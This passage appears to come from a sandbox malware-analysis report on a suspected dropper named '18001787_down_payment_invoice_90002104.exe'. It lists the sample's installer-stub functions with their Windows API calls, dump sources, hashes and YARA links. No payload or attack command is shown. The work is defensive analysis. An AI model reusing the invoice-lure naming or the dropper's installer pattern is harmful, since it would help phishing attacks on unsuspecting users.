                                                                                                                                                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                                                                                                                        • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004060B3
                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                                                                                                                                                                                        • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                        • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                      • String ID: %ls=%ls$[Rename]
                                                                                                                                                                                                                      • API String ID: 2171350718-461813615
                                                                                                                                                                                                                      • Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                                                                                                                      • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040667C Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                                      • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                                      • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe",00403480,C:\Users\user\AppData\Local\Temp\,76013420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe", xrefs: 0040667C
                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040667D, 00406682
                                                                                                                                                                                                                      • *?|<>/":, xrefs: 004066CE
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                      • API String ID: 589700163-2488261258
                                                                                                                                                                                                                      • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                                      • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 00404421
                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404439
                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 0040444C
                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0040445C
                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00404476
                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404480
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                      • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                      • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00422708,00402F08), ref: 004054AB
                                                                                                                                                                                                                      • SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2531174081-0
                                                                                                                                                                                                                      • Opcode ID: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                                                                                                                      • Instruction ID: e73fa1987b6059f35b704de59c80f6892b54c3d1ee51518932a2041d94d0b0cb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d8bd542d8f5d0add287beae510a16995646733a1dc03fc5179ed0d48c47eb8dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE21A171900558BACB119F95DD84ACFBFB5EF84314F10803AF904B22A1C3798A91CFA8
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402E8E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402EA9
                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402EC7
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00402EF5
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                        • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08), ref: 004054AB
                                                                                                                                                                                                                        • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                        • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402DF3,00000000), ref: 00402F19
                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                                                                                                                        • Part of subcall function 00402E72: MulDiv.KERNEL32(00000000,00000064,000033C7), ref: 00402E87
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                                      • String ID: ... %d%%
                                                                                                                                                                                                                      • API String ID: 722711167-2449383134
                                                                                                                                                                                                                      • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                                                                                                                      • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00404D1A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                      • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                      • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00402DF3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 00402E45
                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                                                                                                                                      • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                                                                                                                      • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 6F1D256D Relevance: 9.1, APIs: 6, Instructions: 109COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6F1D121B: GlobalAlloc.KERNELBASE(00000040,?,6F1D123B,?,6F1D12DF,00000019,6F1D11BE,-000000A0), ref: 6F1D1225
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 6F1D265B
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6F1D2690
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40207130676.000000006F1D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207085632.000000006F1D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207174922.000000006F1D3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40207213148.000000006F1D5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6f1d0000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                                                      • Opcode ID: 791421b851ae5e2b98cbde333abe9436d808fe5e834d0b7580d6d4c80c793f08
                                                                                                                                                                                                                      • Instruction ID: 702a0ab72b9247450f8f2cf266c0cb103844c74b0ee0ae9084dba6bce483f985
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 791421b851ae5e2b98cbde333abe9436d808fe5e834d0b7580d6d4c80c793f08
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B310431209681EFCB108F64CD98C6AB7B6FB873D4710466DF96183260D732A836CF11
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
